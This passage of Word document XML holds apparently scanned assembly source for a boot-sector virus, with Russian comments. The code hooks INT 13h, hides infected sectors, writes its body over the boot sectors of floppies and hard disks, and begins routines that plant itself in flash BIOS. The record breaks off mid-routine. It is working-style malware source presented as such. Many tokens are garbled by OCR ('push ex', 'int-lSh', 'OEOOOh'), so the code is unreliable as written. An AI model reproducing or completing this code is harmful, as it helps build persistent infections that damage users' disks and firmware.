        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp cx,1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jne jend </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Проверим номер головки. Если не 0, то запустим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[Оригинальный обработчик </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp dh,0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>jne jend</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">tryJnfect: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Считаем сектор в буфер (для дальнейшей обработки).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;Для этого вызовем оригинальный INT 13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call int13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jc jend </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Сохраним регистры и флаги (обработчик не должен изменить их)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>pushf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push ex</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push dx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push si</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push di</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push es</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">push ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Проверяем, заражен ли данный диск вирусом: читаем сигнатуру.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;Если диск заражен, скрываем присутствие вируса </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp word ptr es:[bx+offset marker],"LV" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">je stealth </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Если диск не заражен, то заражаем: проверим, откуда загружен</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;boot-ceKTOp (с дискеты или с жесткого диска) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp dl,80h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jb infect_floppy </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Установим номера дорожки, головки и сектора для жесткого</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.диска для сохранения оригинального boot-сектора </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov cx,2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xor dh.dh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>jmp write_virus</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnfect_Floppy: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Установим номера дорожки, головки и сектора для дискеты</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;для сохранения оригинального boot-сектора </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov сх,14 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov dh,1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Write_Virus: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Записываем оригинальный boot-сектор</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,0301h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>call int-lSh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jc pop_exit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Установим сегментный регистр ES на сегмент с вирусом</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push cs</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pop es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>;Сбросим флаг зараженности Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov byte ptr cs:flash_done,0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3апишем тело вируса в boot-сектор</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>xor bx,bx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,0301h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov cx,0001h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>xor dh.dh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call int13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>восстановим регистры и флаги (как раз те их значения, которые</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[свидетельствует о том, что boot-сектор только что считали)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Pop_Exit: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop di </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop si </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop dx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ex </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop bx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">popf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Выходим из обработчика в вызывающую программу</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">retf 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3апуск оригинального обработчика</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">J'end: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DD OEAh .Код команды JMP FAR </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;0ригинальный вектор INT13h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">i13 DD 0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Вызов прерывания INT 13h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnt13h proc near </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pushf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call dword ptr cs:[i13] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnt13h endp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Первые два байта слова используются как сигнатура</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Marker db "VLAD" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Эта подпрограмма заражает Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Flash_BIOS Proc Near </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Проверим наличие Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax.OEOOOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>jc no_flash_bios</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp al.OFAh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jne no_flash_bios </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Сначала найдем хорошее место для хранения вируса.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Лросканируем память FOOOh-FFFFh, где обычно находится BIOS,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;на наличие области 1Кбайт нулей. Хватит даже 512 байт памяти,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;но выделить нужно с запасом</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">lnfect_Flash: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Остановим начальный сегмент для поиска</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax.OFOOOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ds.ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Проверим сегмент</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">New_segment: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Остановим стартовое смещение</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">xor si,si </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Остановим счетчик найденных байт</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;(величина свободного места для вируса) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>xor dx.dx</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ok_new_segment: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Перейдем к следующему сегменту</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>inc ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ds,ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Проверим, есть ли еще место для вируса</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp ax.OFFFOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">je no_flash_BIOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Проверим, свободно ли место (для скорости проверяем словами)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Test-16: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp word ptr [si],0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jne new_segment </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Увеличим счетчик размера найденного свободного места</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">• inc dx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Проверим, достаточно ли найденного места. Сравниваем с 1Кбайт, но</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;так как память сканируем словами, сравниваем с 512 (1Кбайт=512 слов) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp dx,512 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">je found_storage </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Увеличим смещение проверяемого байта</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>inc si</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">inc si </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Сравним с 16. Переходим к следующему сегменту</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;в начале каждого параграфа </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp si,16 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">je ok_new_segment </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jmp test16 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;B эту точку попадаем, если место найдено</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Found_storage: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Перейдем к началу зоны</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>sub ax,40h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ds.ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Получим требования к сохранению состояния чипа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,OE001h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Проверим, сколько памяти необходимо для сохранения состояния </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;чипа. Если слишком много, не будем сохранять состояние </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp bx,512 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jbe save_chipset </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Установим флаг, показывающий, что состояние не сохраняли</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov byte ptr cs:chipset,1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Перейдем к записи</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jmp write_enable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Сюда попадаем, если Flash BIOS не обнаружен: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>записывать некуда - выходим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">No_Flash_BIOS: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Сохраним состояние чипа</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">save_chipset: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Установим флаг, показывающий, что состояние сохранили</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov byte ptr cs:chipset,0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Сохраним состояние</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov al,2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push cs</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pop es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov di, offset buffer</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Записываемся во Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">write_enable: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Повышаем напряжение</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov al,5</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 16h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
